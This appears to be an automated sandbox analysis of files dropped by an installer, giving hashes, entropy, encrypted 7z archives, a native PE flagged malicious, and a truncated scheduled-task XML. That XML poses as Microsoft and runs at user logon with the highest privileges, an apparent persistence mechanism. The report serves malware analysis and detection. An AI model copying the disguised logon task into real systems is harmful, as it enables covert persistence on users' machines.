                            Preview:7z..'...2.y.........2.......-Q.|.~..B.~.`j...<k..2a9h.XE.c...o./..S..B6..D....&....!h...r..$d.Z.^e.3...$....Z4......g....<.w<..J..[...;XL.j,.'.p...6'd..UR.$..U..I..T.(.i...z.p2.9.lji.9.....0..(..cT.jDW.l..y.u.G......B3....eR.....L<xB.....0.GV.0T...C..WDB.*(..B.tA.....7.4....g(...xa...jI....$C.swm..Y.#.h_.P.n.q.....mL...g.t....j./.......=....f.Ee..].Ak........!.:.9n|.G..+.j..nC....j.N...x...J..<.L.`..Xt*.."....n.f.Gw.h.....}...m/.:..S.n......m..,.#[>....?.&G.K...M\0a../..8J#._.]..8m...I..@.W}..t5...|.>.`l#.7..}.@|."e.o.v.M..+}.d...t".q....Pk.....d...n.<1t5-.....DL..IWq..6#...9.pm.P@~z.b._....QNe...+...P.........I9|.."..Ko_E....2..^.2`...[..ui......Y.:a.W...B.+'..h6.....r...|..b..SD..*.[1AK&...~..Y...X.<6{....<,......p.'.z..m...}.@..P1..o.`.....,..z..a...<..F.)U..(.!.t...T.....c....~..N...+.....Ks9<.3..f.P.L.g.B...6)..n....(...h.;...f.......P.lJB.......^.3....G..M...VT..S....&{.S..7...*.^\L...U.sKg.G...K..a.lhG.$>.tI.5}9s....@...].sQ,'..Hle.n.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                            Malicious:false
                            Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                            Malicious:false
                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951708
                            Encrypted:true
                            SSDEEP:49152:q2vqFHUMpJh0mjPzJvUUeSCWZbM00JoC/iZ7YHmwKm5OiRg/3btc:qVUMpskLJ00KLxiO/7g/3btc
                            MD5:D5A5A092107E0215609A9C71466EADAE
                            SHA1:50D6E1FB8CDE0E7F7131F12CAF2AD728274EE8FE
                            SHA-256:9007F916A0B68BBE7701F9940D8635E0A0F5E417F600AC875BDEDCEDDECA1F04
                            SHA-512:21F6575350F9840FFE4ED3A6F40EC584848FCD56D1ADD9FCAD527B54B097BCE5DF29F1B39DE709C632E1770C69D1D893BED53518B78AE64ADE9F36B3892B006D
                            Malicious:false
                            Preview:7z..'.....nVpW......@..........J).^G.......m.r..T..Y...s..z4z@..t.6 L.L..\.`..`.~2..M^.;....fnQ...fC.h.@aR....=.&...Se...#Y`..."6N.].0.....1.6s..S.......9..n.l.9.:.....#.....u!......^..........G....v..8....fVd..s..h..._.Q......y.A._g...CBXi~}[.6.Q@..T/..u....w=...n...".^5....#../H.M.|k..; d/d...H.8..,.l.{x^..!......Q.p......>..uU....;9....N..&+.....j.>5...K3..moC.r......J.X.7t...!|....pb.U&.U.mg...*..)....k.U......gr..%.\&V.....p..%\4.P..s....o.~.D..7qY.J...b.F.Gj.......ioV=.L".3-...-[=V`....B..d/p"..._..v?...,.i..d~...)...s.;.AG..m./qc.u.V.?LF...@..0..P.tn.....{I ./A-...5.~A..Z.$7......'y..W.!.x...`.X.......A.........W'D..=.J2^......{.....Y....\...<... ?..=(.;.?].>.....;...1.....U......y...Z...X.[...%.&..x..k.....!...._..\.L...`v.^...|.T..rA3h.....ff..[.o.....m.o........".O...I...KAj.<..u...[...R."..~.E.!...E..*#..f..}C...l.,4.._R.S;9......Zv...w.^...+.]s3.~.6....ih.a!U.S..<..[...G...N......s3..-.......Z.../...g....L[...h.oS.,..o1...1..
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
• Antivirus: Virustotal, Detection: 6%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3482223822620667
                            Encrypted:false
                            SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                            MD5:1E1D0466AB0FE8F2802587D337A10567
                            SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                            SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                            SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1803979
                            Entropy (8bit):7.999882930255694
                            Encrypted:true
                            SSDEEP:49152:ZU4rm4ToT3YZyQXl/kpD0EClXO9XQv5y9wNz:ZpCcJl/k6k9gvfNz
                            MD5:120881F751D8AC3C5ABE1FED5EFAD2AE
                            SHA1:DDB9BDACE6DE20213B844BE9E1FE67B475660455
                            SHA-256:30877048AFCE36333CEFC1E52079DDA43FEB7412F59B5AF132EBF2F3BB710D29
                            SHA-512:EE8B6E2A25F1F94D460502884C03F118DE8D08AB25C31ACEE987C0D16ED69910F4A1D6B785162FBAB5D4DB1AE09F556117C5895D9FDABC2BC766B324B9E54E41
                            Malicious:false
                            Preview:V.y.(.P.U..%...A{...&i.&..8.;...?....R.........*..o...r...*.r........F..~.5XoZ.4...$.. ..>n....[F..=.V...2M?.c.x..5...Y....".s.g.Y..F..3../Q.={!BO.Kz`.8\z...2.g..Z].ZY.};./.c..=.<Um{1...3.3(.....%4...a/.E3..5<..&..U.K;..yD5....d............g.;..8.......v?.Ib...v..J......W...?<.~w..&........c...H...R..vo.Da.3.H.".Y.8.q...B....l\R.D.L...J'G.... .f.K#..Q'.x.Wj....b..v...g..&.o@=.p..j.......h#.......r..!.....Ga.2..4.'f......{.a......D..m.i.+OiG...W.....B...>&..R_.(.ur.x..e....<.e...p.*....%..y4..j.....fP#....%.v.-..}...w......'. ..J.}..H..~!K.#..v4....EX.X3...>.o...0Hw^...t..X....+..S.F.5...E.la....d..R...D.-..hx6....'..PF....*).h....Qq..VU..~..Qi..c-.E.......V..c~N..X...OO.V.. H.....5U...[B.3..N?.0....#.....;.v....2.Y............f..A..v.Z.t:....n.v.UE.A.c.@.d..L.)...l...[....U.kw.B.l...S..E.......[..V..$C%..|KK..=..r..N*.t.G....&.].X.Q...:..k.........h..../N4...C$..t.V.x..t..p.......H@.....(.s8v..I...}`A...)f..%...._[.Z..#S.F..v|.I].....
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:NlllulpgztZ:NllUO
                            MD5:ADB67D140C904AFBF0D2C47FCFC73086
                            SHA1:CAA1973FC7AB5367DC2007487049041C6D0AC54E
                            SHA-256:BA09CC360CD10629A32D8E84392BAD452284123893B0792F6417340A72E3B951
                            SHA-512:85BE6449222EAA096A6F84E051D16DB1147498DA621BDB6C7B5D11CF6C306DB4DE90CEB457EDE22CCA53BC94CF4D1E6D0FAE203D196AF7AF225AF87464E1286E
                            Malicious:false
                            Preview:@...e.................................x..............@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
